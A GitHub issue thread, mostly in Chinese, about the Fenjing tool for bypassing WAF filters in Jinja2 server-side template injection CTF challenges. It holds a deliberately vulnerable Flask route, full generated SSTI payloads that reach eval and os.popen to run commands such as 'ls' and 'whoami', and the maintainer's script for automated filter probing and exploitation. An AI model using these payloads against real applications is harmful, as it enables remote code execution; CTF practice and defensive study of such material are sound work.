search

Marven11 / Fenjing

专为CTF设计的Jinja2 SSTI全自动绕WAF脚本 | A Jinja2 SSTI cracker for bypassing WAF, designed for CTF
Mozilla Public License 2.0
737 stars 46 forks source link

过滤.无法解出题目 #7

Closed yuebusao closed 1 year ago

yuebusao commented 1 year ago

比如今年安洵杯的J4thon。

@SleepWalker.route("/breakme")
def breakme():
    answer = request.args.get('cmd')    
    if answer is not None:
        blacklist = ['0"', '.','"','system', 'eval', 'exec', 'popen', 'subprocess',
                    'posix', 'builtins', 'namespace', 'read', 'self', 'mro', 'base',
                    'global', 'init', 'chr', 'value', 'pop', 'import',
                    'include','request', '{{', '}}','config','=','lipsum','~','url_for']
        for i in blacklist:
            if i in answer:
                answer = i
                return answer
                break
    return render_template_string(answer)

如果碰到黑名单会把碰到的黑名单字符回显出来,运行程序输出示例如下:

INFO:[payload_gen] | Great, we generate eval_func()
INFO:[payload_gen] | Great, string("__import__('os').popen('echo f3n  j1ng;')") can be '__import__(\'os\').popen(\'echo f3n  j1ng;\')'
INFO:[payload_gen] | Great, we generate eval("__import__('os').popen('echo f3n  j1ng;')")
INFO:[payload_gen] | Great, we generate os_popen_obj('echo f3n  j1ng;')
INFO:[payload_gen] | Great, we generate os_popen_read('echo f3n  j1ng;')
INFO:[form_cracker] | Input 'cmd' looks great, testing generated payload.
INFO:[form_cracker] | Test Payload Failed! Generated payloads might be useless.
INFO:[cli] | Use Ctrl+D to exit.
$>> ls
INFO:[payload_gen] | Great, string("__import__('os').popen('ls')") can be '__import__(\'os\').popen(\'ls\')'
INFO:[payload_gen] | Great, we generate eval("__import__('os').popen('ls')")
INFO:[payload_gen] | Great, we generate os_popen_obj('ls')
INFO:[payload_gen] | Great, we generate os_popen_read('ls')
INFO:[cli] | Submit payload {%set oa={}|int%}{%set la=oa**oa%}{%set lla=(la~la)|int%}{%set llla=(lla~la)|int%}{%set lllla=(llla~la)|int%}{%set ob={}|int%}{%set lb=ob**ob%}{%set llb=(lb~lb)|int%}{%set lllb=(llb~lb)|int%}{%set llllb=(lllb~lb)|int%}{%set bb=llb-lb-lb-lb-lb-lb%}{%set sbb=lllb-llb-llb-llb-llb-llb%}{%set ssbb=llllb-lllb-lllb-lllb-lllb-lllb%}{%set zzeb=llllb-lllb-lllb-lllb-lllb-lllb-lllb-lllb-lllb%}{%set zols=lipsum|escape|urlencode|list|escape|urlencode|count%}{%set ltr={}|escape|urlencode|list|escape|urlencode|count%}{%set lea=namespace|escape|urlencode|escape|urlencode|urlencode|urlencode|count%}{%set lel=cycler|escape|urlencode|escape|urlencode|escape|urlencode|escape|urlencode|count%}{%set qo=namespace|escape|urlencode|escape|urlencode|count%}{%set bs=cycler|escape|urlencode|count%}{%set ab=namespace|escape|count%}{%set zb={}|escape|list|escape|count%}{%set t=joiner|urlencode|wordcount%}{%set b={}|escape|urlencode|count%}{%set e=(dict(a=x,b=x,c=x)|count)%}{%set l={}|escape|fi
rst|count%}{%set un=((({}|select()|trim|list)[24]))%}{%set perc=(lipsum[((({}|select()|trim|list)[24]))*2+dict(globals=x)|join+((({}|select()|trim|list)[24]))*2][((({}|select()|trim|list)[24]))*2+dict(builtins=x)|join+((({}|select()|trim|list)[24]))*2][dict(chr=x)|join](37))%}{{((((((lipsum.__globals__).__builtins__).eval)('__import__(\'os\').popen(\'ls\')')).read)())}}
.

把waf加到example.py生成payload,输出信息:

INFO:payload_gen:Great, string('read') can be '\x72\x65\x61\x64'
INFO:payload_gen:Great, we generate os_popen_read('whoami')
shell_payload="{%print((((((((joiner['\\x5f\\x5f\\x69\\x6e\\x69\\x74\\x5f\\x5f'])['\\x5f\\x5f\\x67\\x6c\\x6f\\x62\\x61\\x6c\\x73\\x5f\\x5f'])['\\x5f\\x5f\\x62\\x75\\x69\\x6c\\x74\\x69\\x6e\\x73\\x5f\\x
5f'])['\\x65\\x76\\x61\\x6c'])('\\x5f\\x5f\\x69\\x6d\\x70\\x6f\\x72\\x74\\x5f\\x5f\\x28\\x27\\x6f\\x73\\x27\\x29\\x2e\\x70\\x6f\\x70\\x65\\x6e\\x28\\x27\\x77\\x68\\x6f\\x61\\x6d\\x69\\x27\\x29'))['\\x72\\x65\\x61\\x64'])()))%}"

使用payload报500,原因是两个\程序吧转义符也打印出来了,去掉转义符可以使用该payload。想问作者如何修改程序可以让我直接使用crack参数就可以打通呢?当然用example也可以,只不过感觉用crack一把梭比较爽2333。

感谢。

Marven11 commented 1 year ago

简单看了一下,用下面的方法可以自动检测这类题目的waf

from fenjing import exec_cmd_payload
import requests

url = "http://aaa:.combbb"

def waf(s):
    r = requests.get(url, params = {
        "name": "weshouldseethis" + s
    })
    return "weshouldseethis" in r.text

if __name__ == "__main__":
    shell_payload, _ = exec_cmd_payload(waf, "ls /")
    r = requests.get(url, params={
        "name": shell_payload
    })
    print(r.text)

我等会加进焚靖里就行

Marven11 commented 1 year ago

OK, 使用pip install -U fenjing应该就好了,如果有其他无法解出的情况欢迎提交